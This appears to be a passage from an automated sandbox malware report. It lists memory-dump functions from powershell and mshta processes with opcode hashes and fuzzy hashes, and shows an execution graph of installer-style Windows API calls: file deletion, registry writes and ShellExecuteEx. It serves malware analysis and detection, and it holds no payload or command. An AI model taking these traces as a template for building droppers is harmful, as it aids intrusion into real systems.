                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7972f12b58662f20f0facefdabe9e0e7049c49569640e366d46a7b26fb42a1fc
                                                                              • Instruction ID: 5567095163face2d27284f1e8d310150323c1c69068764ee0c6395be639238b3
                                                                              • Opcode Fuzzy Hash: 7972f12b58662f20f0facefdabe9e0e7049c49569640e366d46a7b26fb42a1fc
                                                                              • Instruction Fuzzy Hash: 8FF0FF31A00115AFCB059B88D9409ADFBB6FF88320F644119E914A3265CB72AD22CB50
                                                                              Function 002A57E0 Relevance: .0, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 15f79553d414ec80e5de8e7f6677922c0167b36193d8b817b9aa7ee539c01f89
                                                                              • Instruction ID: e117a7e5e534396c2354634c231021f82979f91b332522a964e6449eeadc9c84
                                                                              • Opcode Fuzzy Hash: 15f79553d414ec80e5de8e7f6677922c0167b36193d8b817b9aa7ee539c01f89
                                                                              • Instruction Fuzzy Hash: 84E01A70E182499F9B40EFA884811ADBFF0AF5A214F6485EAC809D7212E6314612CB91
                                                                              Function 002A57F0 Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.775979959.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                              • Instruction ID: 13d9e841731c0e8a16ea8b6e9c59bc3cd70f5d493a89a85e24dbee227f0e9789
                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                              • Instruction Fuzzy Hash: BCD017B0D002099F8780EFADC84156EFBF4EF48300F6085AA8908E3301EB329A128BD1

                                                                              Non-executed Functions

                                                                              Function 04B60BE0 Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tPp$$p$$p$$p$$p
                                                                              • API String ID: 0-336990704
                                                                              • Opcode ID: 55dc0f61f48127d916103d824a3b873ad17cec718c7aa72d95f68be131dd29e2
                                                                              • Instruction ID: e3e82c4358ac377130bfbc6180228860f7644f046c637e65d8ce73a18e88dfb0
                                                                              • Opcode Fuzzy Hash: 55dc0f61f48127d916103d824a3b873ad17cec718c7aa72d95f68be131dd29e2
                                                                              • Instruction Fuzzy Hash: 3321C436602201CFCB24EE6AD540A7ABBB4EF84710F6840EAE9569B352D7B5ED40C751
                                                                              Function 04B6365A Relevance: 5.3, Strings: 4, Instructions: 324COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tPp$tPp$tPp$tPp
                                                                              • API String ID: 0-3662552368
                                                                              • Opcode ID: e2b84b70480d05cbd274d72a77445b8f8d597883a554dc270d51a4bd53b0e80b
                                                                              • Instruction ID: cf714a2074204b03ea16fad2db1f8be6b2f8d693916f31853c901c3ee5b9c484
                                                                              • Opcode Fuzzy Hash: e2b84b70480d05cbd274d72a77445b8f8d597883a554dc270d51a4bd53b0e80b
                                                                              • Instruction Fuzzy Hash: E1C17B35B002059FCB24CE58C441AAEFBF2FB85320F6894A9ED569B391CB75EC41DB91
                                                                              Function 04B61B38 Relevance: 5.3, Strings: 4, Instructions: 286COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `\f$h%f$h%f$[f
                                                                              • API String ID: 0-3778661936
                                                                              • Opcode ID: 4ddb088633abdc9a433cb907ac598aa54371feddef6f93a5eb88127fadc0f096
                                                                              • Instruction ID: c17c797af390ce50a0fa5efc7ad51eda04bc5f6f8978d4a18b665ba29647f5ba
                                                                              • Opcode Fuzzy Hash: 4ddb088633abdc9a433cb907ac598aa54371feddef6f93a5eb88127fadc0f096
                                                                              • Instruction Fuzzy Hash: 53C12774A01204DFDB14CF58D584EAABBB2EF88314F68C4A9E806AB355D736FC42CB51
                                                                              Function 04B62120 Relevance: 5.3, Strings: 4, Instructions: 286COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.801831285.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_4b60000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `\f$h%f$h%f$[f
                                                                              • API String ID: 0-3778661936
                                                                              • Opcode ID: f5f66ba861d63d1166dc31638bfcf0d948f6573b328647ecd46ea99aeb564c0f
                                                                              • Instruction ID: af8f9e604b23f8be03a4d4346c1bff29375d11d6b971eab8d8f93cb97f670580
                                                                              • Opcode Fuzzy Hash: f5f66ba861d63d1166dc31638bfcf0d948f6573b328647ecd46ea99aeb564c0f
                                                                              • Instruction Fuzzy Hash: 79C13834A00204DFEB18DF58D584EAABBB2EB89314F64C4E9E906AB355C775FC42CB51

                                                                              Executed Functions

                                                                              Function 03410FC1 Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000003.468322603.0000000003410000.00000010.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_3_3410000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                              • Instruction ID: 3c11ade3c719c212124b216596f3dcb6befe21900d30f5e248621ceefe973db6
                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 03410FB1 Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000003.468322603.0000000003410000.00000010.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_3_3410000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                              • Instruction ID: 3c11ade3c719c212124b216596f3dcb6befe21900d30f5e248621ceefe973db6
                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 03410FB9 Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000003.468322603.0000000003410000.00000010.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_3_3410000_mshta.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                              • Instruction ID: 3c11ade3c719c212124b216596f3dcb6befe21900d30f5e248621ceefe973db6
                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                              • Instruction Fuzzy Hash:

                                                                              Execution Graph

                                                                              Execution Coverage:22.5%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:1367
                                                                              Total number of Limit Nodes:39
                                                                              execution_graph 3279 401941 3280 401943 3279->3280 3281 402c37 18 API calls 3280->3281 3282 401948 3281->3282 3285 40595a 3282->3285 3324 405c25 3285->3324 3288 405982 DeleteFileW 3293 401951 3288->3293 3289 405999 3291 405ab9 3289->3291 3338 40624c lstrcpynW 3289->3338 3291->3293 3356 40658f FindFirstFileW 3291->3356 3292 4059bf 3294 4059d2 3292->3294 3295 4059c5 lstrcatW 3292->3295 3339 405b69 lstrlenW 3294->3339 3296 4059d8 3295->3296 3299 4059e8 lstrcatW 3296->3299 3301 4059f3 lstrlenW FindFirstFileW 3296->3301 3299->3301 3301->3291 3309 405a15 3301->3309 3302 405ae2 3359 405b1d lstrlenW CharPrevW 3302->3359 3305 405a9c FindNextFileW 3305->3309 3310 405ab2 FindClose 3305->3310 3306 405912 5 API calls 3308 405af4 3306->3308 3311 405af8 3308->3311 3312 405b0e 3308->3312 3309->3305 3319 405a5d 3309->3319 3343 40624c lstrcpynW 3309->3343 3310->3291 3311->3293 3315 4052b0 25 API calls 3311->3315 3314 4052b0 25 API calls 3312->3314 3314->3293 3317 405b05 3315->3317 3316 40595a 61 API calls 3316->3319 3318 406012 37 API calls 3317->3318 3321 405b0c 3318->3321 3319->3305 3319->3316 3320 4052b0 25 API calls 3319->3320 3322 4052b0 25 API calls 3319->3322 3344 405912 3319->3344 3352 406012 MoveFileExW 3319->3352 3320->3305 3321->3293 3322->3319 3362 40624c lstrcpynW 3324->3362 3326 405c36 3363 405bc8 CharNextW CharNextW 3326->3363 3329 40597a 3329->3288 3329->3289 3330 4064e0 5 API calls 3336 405c4c 3330->3336 3331 405c7d lstrlenW 3332 405c88 3331->3332 3331->3336 3334 405b1d 3 API calls 3332->3334 3333 40658f 2 API calls 3333->3336 3335 405c8d GetFileAttributesW 3334->3335 3335->3329 3336->3329 3336->3331 3336->3333 3337 405b69 2 API calls 3336->3337 3337->3331 3338->3292 3340 405b77 3339->3340 3341 405b89 3340->3341 3342 405b7d CharPrevW 3340->3342 3341->3296 3342->3340 3342->3341 3343->3309 3369 405d19 GetFileAttributesW 3344->3369 3347 405935 DeleteFileW 3350 40593b 3347->3350 3348 40592d RemoveDirectoryW 3348->3350 3349 40593f 3349->3319 3350->3349 3351 40594b SetFileAttributesW 3350->3351 3351->3349 3353 406033 3352->3353 3354 406026 3352->3354 3353->3319 3372 405e98 3354->3372 3357 405ade 3356->3357 3358 4065a5 FindClose 3356->3358 3357->3293 3357->3302 3358->3357 3360 405ae8 3359->3360 3361 405b39 lstrcatW 3359->3361 3360->3306 3361->3360 3362->3326 3364 405be5 3363->3364 3365 405bf7 3363->3365 3364->3365 3366 405bf2 CharNextW 3364->3366 3367 405c1b 3365->3367 3368 405b4a CharNextW 3365->3368 3366->3367 3367->3329 3367->3330 3368->3365 3370 40591e 3369->3370 3371 405d2b SetFileAttributesW 3369->3371 3370->3347 3370->3348 3370->3349 3371->3370 3373 405ec8 3372->3373 3374 405eee GetShortPathNameW 3372->3374 3399 405d3e GetFileAttributesW CreateFileW 3373->3399 3375 405f03 3374->3375 3376 40600d 3374->3376 3375->3376 3378 405f0b wsprintfA 3375->3378 3376->3353 3380 40626e 18 API calls 3378->3380 3379 405ed2 CloseHandle GetShortPathNameW 3379->3376 3381 405ee6 3379->3381 3382 405f33 3380->3382 3381->3374 3381->3376 3400 405d3e GetFileAttributesW CreateFileW 3382->3400 3384 405f40 3384->3376 3385 405f4f GetFileSize GlobalAlloc 3384->3385 3386 405f71 3385->3386 3387 406006 CloseHandle 3385->3387 3401 405dc1 ReadFile 3386->3401 3387->3376 3392 405f90 lstrcpyA 3395 405fb2 3392->3395 3393 405fa4 3394 405ca3 4 API calls 3393->3394 3394->3395 3396 405fe9 SetFilePointer 3395->3396 3408 405df0 WriteFile 3396->3408 3399->3379 3400->3384 3402 405ddf 3401->3402 3402->3387 3403 405ca3 lstrlenA 3402->3403 3404 405ce4 lstrlenA 3403->3404 3405 405cbd lstrcmpiA 3404->3405 3406 405cec 3404->3406 3405->3406 3407 405cdb CharNextA 3405->3407 3406->3392 3406->3393 3407->3404 3409 405e0e GlobalFree 3408->3409 3409->3387 3410 4015c1 3411 402c37 18 API calls 3410->3411 3412 4015c8 3411->3412 3413 405bc8 4 API calls 3412->3413 3425 4015d1 3413->3425 3414 401631 3416 401663 3414->3416 3417 401636 3414->3417 3415 405b4a CharNextW 3415->3425 3420 401423 25 API calls 3416->3420 3437 401423 3417->3437 3427 40165b 3420->3427 3424 40164a SetCurrentDirectoryW 3424->3427 3425->3414 3425->3415 3426 401617 GetFileAttributesW 3425->3426 3429 405819 3425->3429 3432 40577f CreateDirectoryW 3425->3432 3441 4057fc CreateDirectoryW 3425->3441 3426->3425 3444 406626 GetModuleHandleA 3429->3444 3433 4057d0 GetLastError 3432->3433 3434 4057cc 3432->3434 3433->3434 3435 4057df SetFileSecurityW 3433->3435 3434->3425 3435->3434 3436 4057f5 GetLastError 3435->3436 3436->3434 3438 4052b0 25 API calls 3437->3438 3439 401431 3438->3439 3440 40624c lstrcpynW 3439->3440 3440->3424 3442 405810 GetLastError 3441->3442 3443 40580c 3441->3443 3442->3443 3443->3425 3445 406642 3444->3445 3446 40664c GetProcAddress 3444->3446 3450 4065b6 GetSystemDirectoryW 3445->3450 3447 405820 3446->3447 3447->3425 3449 406648 3449->3446 3449->3447 3451 4065d8 wsprintfW LoadLibraryExW 3450->3451 3451->3449 3463 401e43 3471 402c15 3463->3471 3465 401e49 3466 402c15 18 API calls 3465->3466 3467 401e55 3466->3467 3468 401e61 ShowWindow 3467->3468 3469 401e6c EnableWindow 3467->3469 3470 402abf 3468->3470 3469->3470 3472 40626e 18 API calls 3471->3472 3473 402c2a 3472->3473 3473->3465 4076 402644 4077 402c15 18 API calls 4076->4077 4084 402653 4077->4084 4078 402790 4079 40269d ReadFile 4079->4078 4079->4084 4080 405dc1 ReadFile 4080->4084 4081 402792 4098 406193 wsprintfW 4081->4098 4082 4026dd MultiByteToWideChar 4082->4084 4084->4078 4084->4079 4084->4080 4084->4081 4084->4082 4086 402703 SetFilePointer MultiByteToWideChar 4084->4086 4088 4027a3 4084->4088 4089 405e1f SetFilePointer 4084->4089 4086->4084 4087 4027c4 SetFilePointer 4087->4078 4088->4078 4088->4087 4090 405e3b 4089->4090 4095 405e57 4089->4095 4091 405dc1 ReadFile 4090->4091 4092 405e47 4091->4092 4093 405e60 SetFilePointer 4092->4093 4094 405e88 SetFilePointer 4092->4094 4092->4095 4093->4094 4096 405e6b 4093->4096 4094->4095 4095->4084 4097 405df0 WriteFile 4096->4097 4097->4095 4098->4078 3488 402348 3489 402c37 18 API calls 3488->3489 3490 402357 3489->3490 3491 402c37 18 API calls 3490->3491 3492 402360 3491->3492 3493 402c37 18 API calls 3492->3493 3494 40236a GetPrivateProfileStringW 3493->3494 4109 4016cc 4110 402c37 18 API calls 4109->4110 4111 4016d2 GetFullPathNameW 4110->4111 4112 4016ec 4111->4112 4113 40170e 4111->4113 4112->4113 4116 40658f 2 API calls 4112->4116 4114 401723 GetShortPathNameW 4113->4114 4115 402abf 4113->4115 4114->4115 4117 4016fe 4116->4117 4117->4113 4119 40624c lstrcpynW 4117->4119 4119->4113 4120 401b4d 4121 402c37 18 API calls 4120->4121 4122 401b54 4121->4122 4123 402c15 18 API calls 4122->4123 4124 401b5d wsprintfW 4123->4124 4125 402abf 4124->4125 4126 401f52 4127 402c37 18 API calls 4126->4127 4128 401f59 4127->4128 4129 40658f 2 API calls 4128->4129 4130 401f5f 4129->4130 4132 401f70 4130->4132 4133 406193 wsprintfW 4130->4133 4133->4132 4134 402253 4135 402c37 18 API calls 4134->4135 4136 402259 4135->4136 4137 402c37 18 API calls 4136->4137 4138 402262 4137->4138 4139 402c37 18 API calls 4138->4139 4140 40226b 4139->4140 4141 40658f 2 API calls 4140->4141 4142 402274 4141->4142 4143 402285 lstrlenW lstrlenW 4142->4143 4147 402278 4142->4147 4145 4052b0 25 API calls 4143->4145 4144 4052b0 25 API calls 4148 402280 4144->4148 4146 4022c3 SHFileOperationW 4145->4146 4146->4147 4146->4148 4147->4144 4147->4148 4149 401956 4150 402c37 18 API calls 4149->4150 4151 40195d lstrlenW 4150->4151 4152 40258c 4151->4152 4153 406956 4154 4067da 4153->4154 4155 407145 4154->4155 4156 406864 GlobalAlloc 4154->4156 4157 40685b GlobalFree 4154->4157 4158 4068d2 GlobalFree 4154->4158 4159 4068db GlobalAlloc 4154->4159 4156->4154 4156->4155 4157->4156 4158->4159 4159->4154 4159->4155 4160 401d57 GetDlgItem GetClientRect 4161 402c37 18 API calls 4160->4161 4162 401d89 LoadImageW SendMessageW 4161->4162 4163 401da7 DeleteObject 4162->4163 4164 402abf 4162->4164 4163->4164 4165 402dd7 4166 402de9 SetTimer 4165->4166 4168 402e02 4165->4168 4166->4168 4167 402e57 4168->4167 4169 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4168->4169 4169->4167 4170 4014d7 4171 402c15 18 API calls 4170->4171 4172 4014dd Sleep 4171->4172 4174 402abf 4172->4174 4175 4022d7 4176 4022de 4175->4176 4179 4022f1 4175->4179 4177 40626e 18 API calls 4176->4177 4178 4022eb 4177->4178 4180 4058ae MessageBoxIndirectW 4178->4180 4180->4179 3743 40175c 3744 402c37 18 API calls 3743->3744 3745 401763 3744->3745 3749 405d6d 3745->3749 3747 40176a 3748 405d6d 2 API calls 3747->3748 3748->3747 3750 405d7a GetTickCount GetTempFileNameW 3749->3750 3751 405db0 3750->3751 3752 405db4 3750->3752 3751->3750 3751->3752 3752->3747 4023 4023de 4024 402c37 18 API calls 4023->4024 4025 4023f0 4024->4025 4026 402c37 18 API calls 4025->4026 4027 4023fa 4026->4027 4040 402cc7 4027->4040 4030 402885 4031 402432 4032 40243e 4031->4032 4034 402c15 18 API calls 4031->4034 4035 40245d RegSetValueExW 4032->4035 4037 4030fa 36 API calls 4032->4037 4033 402c37 18 API calls 4036 402428 lstrlenW 4033->4036 4034->4032 4038 402473 RegCloseKey 4035->4038 4036->4031 4037->4035 4038->4030 4041 402ce2 4040->4041 4044 4060e7 4041->4044 4045 4060f6 4044->4045 4046 406101 RegCreateKeyExW 4045->4046 4047 40240a 4045->4047 4046->4047 4047->4030 4047->4031 4047->4033 4181 4047de CoTaskMemFree 4182 405b1d 3 API calls 4181->4182 4183 4047f1 4182->4183 4184 404828 SetDlgItemTextW 4183->4184 4186 40626e 18 API calls 4183->4186 4185 404843 4184->4185 4218 4049eb 4185->4218 4220 405892 GetDlgItemTextW 4185->4220 4187 404810 lstrcmpiW 4186->4187 4187->4184 4189 404821 lstrcatW 4187->4189 4189->4184 4190 404248 8 API calls 4192 4049ff 4190->4192 4191 40486c 4193 405c25 18 API calls 4191->4193 4194 404872 4193->4194 4221 40624c lstrcpynW 4194->4221 4196 404889 4197 406626 5 API calls 4196->4197 4203 404890 4197->4203 4198 4048d1 4222 40624c lstrcpynW 4198->4222 4200 4048d8 4201 405bc8 4 API calls 4200->4201 4202 4048de GetDiskFreeSpaceW 4201->4202 4205 404902 MulDiv 4202->4205 4207 404929 4202->4207 4203->4198 4206 405b69 2 API calls 4203->4206 4203->4207 4205->4207 4206->4203 4208 40499a 4207->4208 4223 404b35 4207->4223 4210 4049bd 4208->4210 4212 40140b 2 API calls 4208->4212 4234 404203 KiUserCallbackDispatcher 4210->4234 4212->4210 4213 40499c SetDlgItemTextW 4213->4208 4214 40498c 4226 404a6c 4214->4226 4217 4049d9 4217->4218 4235 404609 4217->4235 4218->4190 4220->4191 4221->4196 4222->4200 4224 404a6c 21 API calls 4223->4224 4225 404987 4224->4225 4225->4213 4225->4214 4227 404a85 4226->4227 4228 40626e 18 API calls 4227->4228 4229 404ae9 4228->4229 4230 40626e 18 API calls 4229->4230 4231 404af4 4230->4231 4232 40626e 18 API calls 4231->4232 4233 404b0a lstrlenW wsprintfW SetDlgItemTextW 4232->4233 4233->4208 4234->4217 4236 404617 4235->4236 4237 40461c SendMessageW 4235->4237 4236->4237 4237->4218 3453 402862 3454 402c37 18 API calls 3453->3454 3455 402869 FindFirstFileW 3454->3455 3456 402891 3455->3456 3457 40287c 3455->3457 3461 406193 wsprintfW 3456->3461 3459 40289a 3462 40624c lstrcpynW 3459->3462 3461->3459 3462->3457 4245 401563 4246 402a65 4245->4246 4249 406193 wsprintfW 4246->4249 4248 402a6a 4249->4248 4250 401968 4251 402c15 18 API calls 4250->4251 4252 40196f 4251->4252 4253 402c15 18 API calls 4252->4253 4254 40197c 4253->4254 4255 402c37 18 API calls 4254->4255 4256 401993 lstrlenW 4255->4256 4257 4019a4 4256->4257 4258 4019e5 4257->4258 4262 40624c lstrcpynW 4257->4262 4260 4019d5 4260->4258 4261 4019da lstrlenW 4260->4261 4261->4258 4262->4260 4263 404669 4264 404679 4263->4264 4265 40469f 4263->4265 4266 4041e1 19 API calls 4264->4266 4267 404248 8 API calls 4265->4267 4268 404686 SetDlgItemTextW 4266->4268 4269 4046ab 4267->4269 4268->4265 4270 4027e9 4271 4027f0 4270->4271 4274 402a6a 4270->4274 4272 402c15 18 API calls 4271->4272 4273 4027f7 4272->4273 4275 402806 SetFilePointer 4273->4275 4275->4274 4276 402816 4275->4276 4278 406193 wsprintfW 4276->4278 4278->4274 4279 40166a 4280 402c37 18 API calls 4279->4280 4281 401670 4280->4281 4282 40658f 2 API calls 4281->4282 4283 401676 4282->4283 4284 401ced 4285 402c15 18 API calls 4284->4285 4286 401cf3 IsWindow 4285->4286 4287 401a20 4286->4287 3636 4053ef 3637 405410 GetDlgItem GetDlgItem GetDlgItem 3636->3637 3638 405599 3636->3638 3681 404216 SendMessageW 3637->3681 3640 4055a2 GetDlgItem CreateThread CloseHandle 3638->3640 3641 4055ca 3638->3641 3640->3641 3684 405383 OleInitialize 3640->3684 3642 4055f5 3641->3642 3644 4055e1 ShowWindow ShowWindow 3641->3644 3645 40561a 3641->3645 3646 405655 3642->3646 3648 405609 3642->3648 3649 40562f ShowWindow 3642->3649 3643 405480 3651 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3643->3651 3683 404216 SendMessageW 3644->3683 3650 404248 8 API calls 3645->3650 3646->3645 3654 405663 SendMessageW 3646->3654 3655 4041ba SendMessageW 3648->3655 3657 405641 3649->3657 3658 40564f 3649->3658 3656 405628 3650->3656 3652 4054f5 3651->3652 3653 4054d9 SendMessageW SendMessageW 3651->3653 3659 405508 3652->3659 3660 4054fa SendMessageW 3652->3660 3653->3652 3654->3656 3661 40567c CreatePopupMenu 3654->3661 3655->3645 3662 4052b0 25 API calls 3657->3662 3663 4041ba SendMessageW 3658->3663 3665 4041e1 19 API calls 3659->3665 3660->3659 3664 40626e 18 API calls 3661->3664 3662->3658 3663->3646 3666 40568c AppendMenuW 3664->3666 3667 405518 3665->3667 3668 4056a9 GetWindowRect 3666->3668 3669 4056bc TrackPopupMenu 3666->3669 3670 405521 ShowWindow 3667->3670 3671 405555 GetDlgItem SendMessageW 3667->3671 3668->3669 3669->3656 3672 4056d7 3669->3672 3673 405544 3670->3673 3674 405537 ShowWindow 3670->3674 3671->3656 3675 40557c SendMessageW SendMessageW 3671->3675 3676 4056f3 SendMessageW 3672->3676 3682 404216 SendMessageW 3673->3682 3674->3673 3675->3656 3676->3676 3677 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3676->3677 3679 405735 SendMessageW 3677->3679 3679->3679 3680 40575e GlobalUnlock SetClipboardData CloseClipboard 3679->3680 3680->3656 3681->3643 3682->3671 3683->3642 3685 40422d SendMessageW 3684->3685 3686 4053a6 3685->3686 3689 401389 2 API calls 3686->3689 3690 4053cd 3686->3690 3687 40422d SendMessageW 3688 4053df OleUninitialize 3687->3688 3689->3686 3690->3687 4288 40176f 4289 402c37 18 API calls 4288->4289 4290 401776 4289->4290 4291 401796 4290->4291 4292 40179e 4290->4292 4326 40624c lstrcpynW 4291->4326 4327 40624c lstrcpynW 4292->4327 4295 40179c 4299 4064e0 5 API calls 4295->4299 4296 4017a9 4297 405b1d 3 API calls 4296->4297 4298 4017af lstrcatW 4297->4298 4298->4295 4309 4017bb 4299->4309 4300 40658f 2 API calls 4300->4309 4301 405d19 2 API calls 4301->4309 4303 4017cd CompareFileTime 4303->4309 4304 40188d 4305 4052b0 25 API calls 4304->4305 4308 401897 4305->4308 4306 4052b0 25 API calls 4314 401879 4306->4314 4307 40624c lstrcpynW 4307->4309 4310 4030fa 36 API calls 4308->4310 4309->4300 4309->4301 4309->4303 4309->4304 4309->4307 4315 40626e 18 API calls 4309->4315 4321 4058ae MessageBoxIndirectW 4309->4321 4324 401864 4309->4324 4328 405d3e GetFileAttributesW CreateFileW 4309->4328 4311 4018aa 4310->4311 4312 4018be SetFileTime 4311->4312 4313 4018d0 CloseHandle 4311->4313 4312->4313 4313->4314 4316 4018e1 4313->4316 4315->4309 4317 4018e6 4316->4317 4318 4018f9 4316->4318 4319 40626e 18 API calls 4317->4319 4320 40626e 18 API calls 4318->4320 4322 4018ee lstrcatW 4319->4322 4323 401901 4320->4323 4321->4309 4322->4323 4325 4058ae MessageBoxIndirectW 4323->4325 4324->4306 4324->4314 4325->4314 4326->4295 4327->4296 4328->4309 4329 402570 4330 402c37 18 API calls 4329->4330 4331 402577 4330->4331 4334 405d3e GetFileAttributesW CreateFileW 4331->4334 4333 402583 4334->4333 4335 401b71 4336 401bc2 4335->4336 4337 401b7e 4335->4337 4339 401bc7 4336->4339 4340 401bec GlobalAlloc 4336->4340 4338 4022de 4337->4338 4345 401b95 4337->4345 4342 40626e 18 API calls 4338->4342 4348 401c07 4339->4348 4356 40624c lstrcpynW 4339->4356 4341 40626e 18 API calls 4340->4341 4341->4348 4344 4022eb 4342->4344 4350 4058ae MessageBoxIndirectW 4344->4350 4354 40624c lstrcpynW 4345->4354 4346 401bd9 GlobalFree 4346->4348 4349 401ba4 4355 40624c lstrcpynW 4349->4355 4350->4348 4352 401bb3 4357 40624c lstrcpynW 4352->4357 4354->4349 4355->4352 4356->4346 4357->4348 3691 4024f2 3692 402c77 18 API calls 3691->3692 3693 4024fc 3692->3693 3694 402c15 18 API calls 3693->3694 3695 402505 3694->3695 3696 402521 RegEnumKeyW 3695->3696 3697 40252d RegEnumValueW 3695->3697 3698 402885 3695->3698 3699 402549 RegCloseKey 3696->3699 3697->3699 3700 402542 3697->3700 3699->3698 3700->3699 4358 401a72 4359 402c15 18 API calls 4358->4359 4360 401a78 4359->4360 4361 402c15 18 API calls 4360->4361 4362 401a20 4361->4362 3702 401573 3703 401583 ShowWindow 3702->3703 3704 40158c 3702->3704 3703->3704 3705 40159a ShowWindow 3704->3705 3706 402abf 3704->3706 3705->3706 4363 4042f5 lstrcpynW lstrlenW 4364 4014f5 SetForegroundWindow 4365 402abf 4364->4365 4373 401e77 4374 402c37 18 API calls 4373->4374 4375 401e7d 4374->4375 4376 402c37 18 API calls 4375->4376 4377 401e86 4376->4377 4378 402c37 18 API calls 4377->4378 4379 401e8f 4378->4379 4380 402c37 18 API calls 4379->4380 4381 401e98 4380->4381 4382 401423 25 API calls 4381->4382 4383 401e9f 4382->4383 4390 405874 ShellExecuteExW 4383->4390 4385 401ee1 4386 4066d7 5 API calls 4385->4386 4388 402885 4385->4388 4387 401efb CloseHandle 4386->4387 4387->4388 4390->4385 3729 40167b 3730 402c37 18 API calls 3729->3730 3731 401682 3730->3731 3732 402c37 18 API calls 3731->3732 3733 40168b 3732->3733 3734 402c37 18 API calls 3733->3734 3735 401694 MoveFileW 3734->3735 3736 4016a0 3735->3736 3737 4016a7 3735->3737 3739 401423 25 API calls 3736->3739 3738 40658f 2 API calls 3737->3738 3741 40224a 3737->3741 3740 4016b6 3738->3740 3739->3741 3740->3741 3742 406012 37 API calls 3740->3742 3742->3736 4048 4020fe 4049 402c37 18 API calls 4048->4049 4050 402105 4049->4050 4051 402c37 18 API calls 4050->4051 4052 40210f 4051->4052 4053 402c37 18 API calls 4052->4053 4054 402119 4053->4054 4055 402c37 18 API calls 4054->4055 4056 402123 4055->4056 4057 402c37 18 API calls 4056->4057 4058 40212d 4057->4058 4059 40216c CoCreateInstance 